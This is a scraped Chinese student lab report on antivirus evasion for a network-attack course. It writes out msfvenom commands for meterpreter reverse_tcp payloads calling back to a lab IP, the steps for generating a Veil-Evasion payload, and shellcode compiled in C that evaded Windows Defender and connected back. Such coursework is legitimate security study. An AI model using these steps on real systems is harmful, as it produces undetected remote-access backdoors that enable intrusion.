2. 程式人生 > >20155217《網絡對抗》Exp03 免殺原理與實踐

20155217《網絡對抗》Exp03 免殺原理與實踐

阿新 發佈:2018-04-07
pre 使用 程序 use cnblogs 多次 scan www. 變化

20155217《網絡對抗》Exp03 免殺原理與實踐

實踐內容

  1. 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧。
  2. 通過組合應用各種技術實現惡意代碼免殺(如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖)。
  3. 用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,註明電腦的殺軟名稱與版本。

正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧

  • 首先先把上次的後門放在virscan.org上檢測一下(有些需要重命名才能檢測)。

技術分享圖片

  • 發現查殺率還是比較高的。
  • 嘗試使用msf進行多次編碼,但發現編碼次數再多,也沒什麽實質性的變化,均不能實現免殺。
  • 生成jarmsfvenom -p java/meterpreter/reverse_tcp lhost=192.168.199.137 lport=5217 x> ydshell.jar
  • 下載並安裝veil-evasion。這個過程出現的各種錯誤讓人崩潰= =,這裏推薦安裝教程和使用教程!是親親杜可欣同學推薦的,用過的人都說好!

技術分享圖片

  • 打開tools/Veil/,運行Veil.py成功。

技術分享圖片

  • veil啟動後,依次輸入:
  1. use python/meterpreter/rev_tcp
  2. set LHOST 192.168.199.137
  3. generate
  4. Please enter the base name for output files (default is ‘payload‘):veil5217
  5. 選擇1
  • 發現並不能生成Python語言的可執行文件QAQ。

技術分享圖片

技術分享圖片

  • 於是和很多同學一樣,換了一個語言use c/meterpreter/rev_tcp.py,重復上面的操作,發現很是ok,可以生成可執行文件啦。

技術分享圖片

  • 把Veil生成的小程序放在Win10下,被馬上發現了= =。

技術分享圖片

  • 再把它放在網站上掃描一下,結果...唉。

技術分享圖片

利用shellcode編程實現免殺

  • 首先關閉win10防火墻和殺毒軟件,ping通,可以回連成功。

技術分享圖片

  • 使用msf生成一個C語言格式的shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.137 LPORT=5217 -f

技術分享圖片

  • 嘗試使用交叉編譯,但結果無法運行。

技術分享圖片

技術分享圖片

技術分享圖片

  • 在win10中下載VS並安裝,選擇桌面C++開發,繼續安裝。
  • 把shellcode寫成c文件,編譯生成的exe文件存放在Debug文件夾裏。

技術分享圖片

  • 嘗試回連,成功。

技術分享圖片

  • 生成的exe文件放在網站上檢測一下(竟然只是警惕而已哎)。

技術分享圖片

20155217《網絡對抗》Exp03 免殺原理與實踐

相關推薦

對抗 Exp3 原理實踐 20154311 王卓然

下載軟件 get 改變 網站 加密 純手工 com 代碼 操作模式 Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? ①基於特征碼的檢測:AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是

20155217對抗Exp03 原理實踐

pre 使用 程序 use cnblogs 多次 scan www. 變化 20155217《網絡對抗》Exp03 免殺原理與實踐 實踐內容 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工

20155227《對抗》Exp2 後門原理實踐

web img 準備 etc ons 並運行 reverse 體會 定時 20155227《網絡對抗》Exp2 後門原理與實踐 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 在非官方網站下載軟件時,後門很可能被捆綁在軟件中。 攻擊者利用欺騙的手段,

20154324 劉康權 《對抗》Exp2 後門原理實踐

nsh png netcat nta vim編輯 時間 clas 自己的 rontab 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建立一個後門連接

2017-2018-4 20155317《對抗技術》EXP3 原理實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

20154307《對抗》Exp3 原理實踐

mark 我們 blocks 意思 釣魚 class 做了 更改權限 asio 20154307《網絡對抗》Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程

20155232《對抗》Exp3 原理實踐

分享圖片 alt 特征碼 apt 基本 什麽 簡單介紹 主機 介紹 20155232《網絡對抗》Exp3 免殺原理與實踐 問題回答 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 特征碼:一段特征碼就是一段或多段數據。 如果一個可執行文件(或其

2017-2018-2 20155230《對抗技術》實驗3:原理實踐

語言 code 編碼 病毒 div 就是 加密 網絡 殺毒軟件 基礎問題回答 1、殺軟是如何檢測出惡意代碼的? 殺軟檢測惡意代碼主要有三種方式: ①特征碼的檢測:殺毒軟件的病毒庫記錄了一些惡意軟件的特征碼,這些特征碼由一個不大於64字節的字符串組成,且是只有該病毒內

20155338《對抗》Exp3 原理實踐

調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言 20155338《網絡對抗》Exp3 免殺原理與實踐 實驗過程 一、免殺效果參考基準 Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進

2018-2019-2 對抗技術 20165311 Exp3 原理實踐

col eno 比較 encode var 針對 name -s cnblogs 2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐 免殺原理及基礎問題回答 實驗內容 任務一:正確使用msf編碼器,msfvenom生成如j

2018-2019-2 對抗技術 20165334 Exp3 原理實踐

語言 保護 r文件 原理 添加 ima port 復制 png 2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐 一、實驗內容 任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellc

2018-2019-2 對抗技術 20165210 Exp3 原理實踐

問題 網站 丟失 其他 圖片 https 壓縮包 exe 生成 2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐 免殺的概述 免殺,也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面,英文為Anti-AntiViru

2018-2019-2 對抗技術 20165326 Exp3 原理實踐

log ant tool 能夠 校驗和 nco bin .html 錯誤代碼 免殺原理與實踐 目錄 知識點問答 實踐內容 遇到的問題 心得體會 知識點 meterpreter免殺 基礎問題回答 殺軟是如何檢測出惡意代碼的? 特征碼(基於簽名):模式匹配,比對特

20165214 2018-2019-2 《對抗技術》Exp3 原理實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

20164317《對抗技術》Exp3 原理實踐

實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個 一、實驗要求 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellco

20155220 攻防技術 實驗三 原理實踐

基於 back 網絡攻防 lis 方法 由於 原理 使用 生成可執行文件 網絡攻防技術 實驗三 免殺原理與實踐 使用msf生成後門程序的檢測 首先我們對上次實驗生成的後門exe,利用VirSCAN進行檢測 然後我們利用msfvenom -p java/meterp

Exp3 原理實踐20154302薛師凡

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

Exp3 原理實踐

asi 目標 專業 http lac 基礎 put 源文件 是個 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? -檢測特征碼 -基於行為檢測 -啟發式檢測類似 (2)免殺是做什麽? 使惡意軟件不被AV檢

20155202張旭 Exp3 原理實踐

ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理 20155202張旭 Exp3 免殺原理與實踐 AV廠商檢測惡意軟件的方式主流的就三種: 基於特征碼的檢測 啟發式惡意軟件檢測 基於行為的惡意軟件檢測 我們要做的就是讓我們的惡意軟件沒法被這三種方式找到

20155320 Exp3 原理實踐

可執行 惡意代碼 執行 AR 後門 lock 函數 工具 文件復制 20155320 Exp3 免殺原理與實踐 免殺 一般是對惡意軟件做處理,讓它不被殺毒軟件所檢測。也是滲透測試中需要使用到的技術。 【基礎問題回答】 (1)殺軟是如何檢測出惡意代碼的? 1.通過行